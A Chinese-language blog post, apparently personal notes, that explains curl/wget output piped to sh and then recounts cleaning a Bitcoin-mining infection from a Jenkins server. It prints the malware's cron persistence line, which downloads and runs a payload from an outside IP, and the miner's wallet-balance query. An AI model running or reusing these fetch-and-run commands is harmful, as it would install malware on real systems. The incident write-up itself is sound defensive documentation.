curl

1
curl -s http://192.168.15.12/abc.bin | sh

wget

1
wget -q -O- http://192.168.15.12/abc.bin | sh

-q的含义是:–quiet,安静模式,无信息输出。

-O的含义是把后面网址下载后,改成一个指定的名称,如果后面没有跟着一个名字,而是“-”,则表示将下载后的内容输出到标准输出,也就是输出到屏幕上。

-qO-的含义:把下载的内容输出到标准输出,但并不在屏幕显示,目的当然是直接传递给bash进行解析执行了。

参考

linux命令行下调用别名的原命令

默认的一些命令都是alias后的命令,方便人眼识别和阅读等

在命令前加上反斜杠临时取消使用别名

例如:\ls

则直接调用ls的原始命令

而不会使用alias设置的带有color选项的命令

参考

比特币病毒

为了方便外网同事使用jenkins编译程序,结果中毒了!还好没有带来损失。

查找所有和Jenkins相关的进程

从进程中,我们发现有一个进程非常可疑

以下是访问链接

1
curl -s https://blockchain.info/balance?cors=true&active=1PETrfsS8x6UfC7ktYmX5xkc7Q8Df9q1Qj|1EPe9Sxrh1kYrgju5aMJuS7d3DiqUWtF9D|1QHDSLbeQTVJUiBryNpx6SBXYpTyDr9x66|1Mv8rVuhyRbcizhvqneP932E9WBUkRyRwG|1KnEz1B5SbPosqbFsBBB88DeySyJwpGeLg|1H3gFZbXvTbaxrGNPSUBzyMG6GgA3XuNCs|19UCoreDw3drhWivjKxwqHQDXuTJqoR43X|18HpkeN4tPHtv7ZfpAmZcMuD9JQTWw34cW|1NuUYe9Yh9uVDTwDTUu1wexPYERqJ7xoGe|12JYm61nym1aXAGaTah37foXq1PKzSsKbs|1Pe5RKoTCfkUdBKahjcjJpCnC6SEZiv73k|1DG4Y17pMhX8W7b7T7kpLk7SGPVjhozfvs|1Eepu3rrX5s3QahnL6VxTsLCt9Jk893jxQ|1D18AUn1zu4zbamrvxQtDjDGM7tVebDaBt|18bTnQqAbSxomekA1S69YgstUYbqJ75Wiv|1JZs5m5xwZz6DTK1kyrmbh2TuGurMgEEuu|1kXBrhMdw33oX9PqYwWKFVghSnsWmK36J|16ci4z5Y8CiCX4nK8XEaAA48oiyDseSX7m|1DPCFacH3bQJ4t9Bnx8t26aErWdtbjAzPg|12T1Fxcd6KYFwRNcBUb7baNCbVUDvMeUdC|15SjGWEzZsnbkmVnkP6WJcQgkGfDEdqoPs|1AAnSyzST3sicyayAhR71Gk8wV8GhfbLZc|15kXeDinqdLfL1yv67fNaXj6ExHe8Rfn99|1FGZghmcQgQxguMzGw1osHpSeXLxP7iTuP|17A7iBuDrKutiqyRd3YqKcr2sSBidbqGm6|1FjSQ7EW1WtKfsa6hhE6W7gvUZRxFs5tMn|1AKHNBPXJtbDigZULCLbpcUajYr9cpKztn|1LBWheVjMdNPeEJ3Wjq18MGwoNNTUy7Jm4|1AiBZX5exwP39fRLBHnWTCWcqBt4YMU1Jo|1CKz7kvhGnb5saBNwbxRs3ME1rTJrv49ZH|1Mm14atTvn4H59vTDfZ2mya9HAR733Zt4B|1QJxBLs8xj83oFDMGj9yEToAFcEzSjmuJH|1AbaSwPpTr1FPxFGQBbr3WGBhBJMsoG8PN|14fiNgZk8DSCsbEcFxWXxbACbEAyKLKqia|14dS6FieQB4iMWRvaKSUgDLeLXXNRVYXjY|1GR3GQuBmyEm2SomFrkbdPBcZ7mBYcqWV8|17D5cWEKCi9cULcostmGBh3y6SaPctTZKH|15tU56yDN6eFC5ttCxBMbrGRtEfTM6a57a|1Am3mHyfYMEApER5Uy8VxnmZie8epyDofr|1nkvuYZpYRpYGaHooW93usJkSrexnVhNG|14yUtwYPgxfPQf8uXN2AuiXEudjWdiGziZ|1FcXNhC7VjUcvAdF74WbcuLUjupUkQh8xu|1CdWHNbC5NoJoNHNdTfEkzjNzdnXfPJZ1c|1A1aFcJMSpsG4SpebRPU93SpcMJRuWR9ry|16r13tuk1wZk4u9hporeFFSmMi3FBWsoiP|1GHmN9RWcRXGf3HEqzdjVJTaNQsQsRxVoh|18zQq7BVLEzybaxdmWe5ANp1CHxYFiNULv|17GSHgR8AZrDxJLoU4Shv4cf5MQTAKhBF3|13fD8HzXiwLHa7GVMsQjCEUwh4qz54qrnZ|1FUqctkFvrJvSpyCwAs7VGFeKiZh3DvFyU|17GAgPXvpWDgraXAHirH5Lu74qKo2hLQyk|1Lv8G4d3dAFnp6f76vF7eye25ayNz2wDFb|19KckVeD8LncJJAHuoJ1Gx4MEEtiXfJ5C1|12KD24S9h8f6aX4PGPeyMnKpt2SFfAsvKE|18KYHhZwHY7WLd7caC9Wmce1ZrFnJCADFR|13yY1VGYnj1LhDaroAM3N2teeQeuUW2kXm|1PBSJ2kVdFJ9K7Tv7gQx3qwQqcAcyrzeiF|15CAbrEZSpXEAN1vsqoH5W1kuJ1t2iyRV2|1PNaejHuS76nV5VRc5PzBunQvLyoR8vj7V|1DkkAwkrmSYDfqDVtWkYRL3bJS5cW5w6Fc|1LjbtTT3Q4zoxFYfv4HpjY6C2EczCtXvyW|1NC95PosxV2NJpY9tr22NFNwhhfsSEYbqU|19JHejxEUZEKnQCHgtMPrWVt5wvKW8BbqG|1EYXaB699EMXTQkshrXpTEcZUR5cPDkh9M

删除所有Jenkins相关内容后,隔天发现,进程还是异常的

通过Pid跟踪进程

通过Pid跟踪进程

查看进程树

找到定时任务路径

查看定时任务内容

1
2
3
vim /var/spool/cron/jenkins

*/55 * * * * (curl -s http://185.164.72.119/log_rotate.bin||wget -q -O- http://185.164.72.119/log_rotate.bin)|sh

清除定时任务

Kill进程,持续跟进

近期文章

相关页面